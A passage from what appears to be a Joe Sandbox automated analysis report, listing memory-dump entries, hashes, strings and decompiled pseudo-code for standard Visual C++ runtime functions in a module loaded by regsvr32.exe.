                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 83251219-3442986447
                                • Opcode ID: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                • Instruction ID: afb1911e3f8ba5d231fe6bb84017af69377ca2ae416e2d0ba459e573d29e7d3a
                                • Opcode Fuzzy Hash: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                • Instruction Fuzzy Hash: 0BF1C87260CBC186E7B1CB25E8947AEB7E4E384785F604125EACD87AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                • API String ID: 2123368286-2816485415
                                • Opcode ID: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                • Instruction ID: 498ed5c56ac792471b44c6766317b9cb43c4201113c662a7075568a19f5733c1
                                • Opcode Fuzzy Hash: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                • Instruction Fuzzy Hash: 0E617B72A1D64686EB909B28EC4176E73E1F780354F608225E6DE47AF5D77EE400CF02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno$_invalid_parameter
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                • API String ID: 747159061-2992490823
                                • Opcode ID: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                • Instruction ID: b3e96d9819a7910145883aa8d7fc7971cc91d039debb2f2cb13e78280c4cdede
                                • Opcode Fuzzy Hash: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                • Instruction Fuzzy Hash: 2F516B71A186468AE7909B69EC8176E73E2F380758F608621E2DD476F5D77EE400CF02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1328470723-1899493600
                                • Opcode ID: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                • Instruction ID: a75f166a54a10c782c9e5936c38e4db03d9624ec2b4b775b3bb68b676b0f6840
                                • Opcode Fuzzy Hash: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                • Instruction Fuzzy Hash: 38C10D72A0CAC286E7B19B55E8447AFB7E0F384346F604125E6C987AE9DB7DE444CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                • String ID:
                                • API String ID: 2352934578-0
                                • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                • API String ID: 2123368286-322314505
                                • Opcode ID: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                • Instruction ID: 4ea1f2baf56cb797ddf9edfbcd87f382fde430b96fb790801732b827a7e5f6be
                                • Opcode Fuzzy Hash: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                • Instruction Fuzzy Hash: 02023E32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1139040907-3988320827
                                • Opcode ID: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                • Instruction ID: be767cf373226b306d5cc4d655a52930cc25a89ebff261bf8d2d4167a1edb2b7
                                • Opcode Fuzzy Hash: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                • Instruction Fuzzy Hash: 48F1DA72A0CAC18AE7A08B55E8407AFB7E0F7C5756F600126E6CD87AA9DB7DD440CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                • API String ID: 2123368286-3300880850
                                • Opcode ID: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                • Instruction ID: 4116fe211f4ce550b5db6f2beda9aad957ea61137f05a11edd57804cc24ee7cf
                                • Opcode Fuzzy Hash: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                • Instruction Fuzzy Hash: A4C14B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA5DF7ED084CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                • API String ID: 2123368286-3045918802
                                • Opcode ID: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                • Instruction ID: 83c83e0f84f27b13c419585d1e3107a86c1b002b2dbb410691c45864cb0988c3
                                • Opcode Fuzzy Hash: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                • Instruction Fuzzy Hash: 3AC13D3190DB8A85EBA08B19E84436EA3E0F386794F614135D6DE43BB5DF7ED448CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 15%
                                			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                				intOrPtr _v24;
                                				long long _v32;
                                				intOrPtr _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				char _v88;
                                				intOrPtr _v96;
                                				long long _v104;
                                				void* _t80;
                                				void* _t81;
                                				void* _t89;
                                				void* _t92;
                                				intOrPtr _t102;
                                				intOrPtr* _t136;
                                				intOrPtr* _t137;
                                				intOrPtr* _t139;
                                				signed char* _t141;
                                				intOrPtr* _t142;
                                				intOrPtr* _t143;
                                				intOrPtr* _t144;
                                				intOrPtr* _t148;
                                				intOrPtr* _t149;
                                
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __rdx;
                                				_a8 = __rcx;
                                				if (_a16 == 0) goto 0xf9d3f031;
                                				if (_a24 != 0) goto 0xf9d3f038;
                                				goto 0xf9d3f31a;
                                				_t136 = _a16;
                                				if ( *_t136 != 0) goto 0xf9d3f066;
                                				if (_a8 == 0) goto 0xf9d3f05f;
                                				 *_a8 = 0;
                                				goto 0xf9d3f31a;
                                				0xf9d266b0();
                                				_t80 = E000007FE7FEF9D26840(0,  &_v88);
                                				_t137 =  *_t136;
                                				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
                                				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
                                				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
                                				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                				_v104 = _t139;
                                				r9d = 0;
                                				r8d = 0x47;
                                				0xf9d2b3b0();
                                				if (_t81 != 1) goto 0xf9d3f0d2;
                                				asm("int3");
                                				E000007FE7FEF9D26840(0,  &_v88);
                                				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
                                				if (_a8 == 0) goto 0xf9d3f106;
                                				_t141 = _a16;
                                				 *_a8 =  *_t141 & 0x000000ff;
                                				_v56 = 1;
                                				E000007FE7FEF9D26800( &_v88);
                                				goto 0xf9d3f31a;
                                				E000007FE7FEF9D26840(_v56,  &_v88);
                                				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
                                				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
                                				_t142 =  *_t141;
                                				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
                                				E000007FE7FEF9D26840(_t89,  &_v88);
                                				_t143 =  *_t142;
                                				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
                                				if (_a8 == 0) goto 0xf9d3f191;
                                				_v36 = 1;
                                				goto 0xf9d3f199;
                                				_v36 = 0;
                                				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                				_t144 =  *_t143;
                                				_v32 = _t144;
                                				E000007FE7FEF9D26840(_t92,  &_v88);
                                				_v96 = _v36;
                                				_v104 = _a8;
                                				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
                                				E000007FE7FEF9D26840(_t94,  &_v88);
                                				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
                                				_t148 = _a16;
                                				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
                                				0xf9d2ab30();
                                				 *_t148 = 0x2a;
                                				_v52 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_v88);
                                				goto 0xf9d3f31a;
                                				E000007FE7FEF9D26840(_v52,  &_v88);
                                				_t149 =  *_t148;
                                				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                				E000007FE7FEF9D26800( &_v88);
                                				_t102 = _v48;
                                				goto 0xf9d3f310;
                                				if (_a8 == 0) goto 0xf9d3f28b;
                                				_v24 = 1;
                                				goto 0xf9d3f293;
                                				_v24 = 0;
                                				E000007FE7FEF9D26840(_t102,  &_v88);
                                				_v96 = _v24;
                                				_v104 = _a8;
                                				r9d = 1;
                                				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
                                				0xf9d2ab30();
                                				 *((intOrPtr*)( *_t149)) = 0x2a;
                                				_v44 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_v88);
                                				goto 0xf9d3f31a;
                                				_v40 = 1;
                                				E000007FE7FEF9D26800( &_v88);
                                				goto 0xf9d3f31a;
                                				return E000007FE7FEF9D26800( &_v88);
                                			}





























                                APIs
                                Strings
                                • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                • API String ID: 3162172745-1617866167
                                • Opcode ID: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                • Instruction ID: e2321dfd7d4ce97f8464894d094ef21069f5ab619bd2151a5dc0ee19d75eafe6
                                • Opcode Fuzzy Hash: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                • Instruction Fuzzy Hash: A9913B32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 792801276-1329727594
                                • Opcode ID: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                • Instruction ID: 74781b4b54cd9912b8e06a4704f6bb443746ab51bab07e1bca88e51f830d20d4
                                • Opcode Fuzzy Hash: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                • Instruction Fuzzy Hash: E9613972A0D7C186E7B49B51E8907AEBBA0F784740FA18126D6CD47BA9DB3ED444CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno$_invalid_parameter
                                • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                • API String ID: 747159061-3177431134
                                • Opcode ID: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                • Instruction ID: 4f8ff4572e8635f5027188ec8a382c63b1dfded0e2620b7392a92efec120cf46
                                • Opcode Fuzzy Hash: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                • Instruction Fuzzy Hash: 78518971A1864A8AF7909B59E89076DB3E1F3807A5F609221E2ED477F4C7BEE5008B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                • API String ID: 1608253119-1427866139
                                • Opcode ID: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                • Instruction ID: bd1364e327bffe51ea07524ffa85e9f05d80aa3f671785f44ca1c30fb28e73d7
                                • Opcode Fuzzy Hash: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                • Instruction Fuzzy Hash: 4D41253191DB4686E7A09B14E84436E76E0F785780F614535E6CD42AF8DBBEE484CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                • API String ID: 2123368286-2958264153
                                • Opcode ID: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                • Instruction ID: d7cc4d0e782f1b7c612564dac91e9d2cb6f3b6ce272f4d7ad0d490e9b620c06e
                                • Opcode Fuzzy Hash: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                • Instruction Fuzzy Hash: 49E14D31A1DA868AEBB48B24E84076EB3E0F385765F204235E6DD43BE5DB7ED445CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1967237116-569934968
                                • Opcode ID: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                • Instruction ID: 22a9a72b2ea07787f3d01dc0e5522a3b9409a08ca4ad9fd04da88529524a1eb4
                                • Opcode Fuzzy Hash: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                • Instruction Fuzzy Hash: B4D11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E000007FE7FEF9D3BFDE(char _a696, char _a976) {
                                
                                				_a976 = _a696;
                                				_a976 = _a976 - 0x41;
                                				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                				goto __rax;
                                			}




                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: wctomb_s
                                • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2215178078-1895985292
                                • Opcode ID: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                • Instruction ID: 7adfc43390c165502d6a8fb190fde7d628b4034d943845d6c2f74ff038b9ebc8
                                • Opcode Fuzzy Hash: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                • Instruction Fuzzy Hash: 64B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F204125DAD987AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
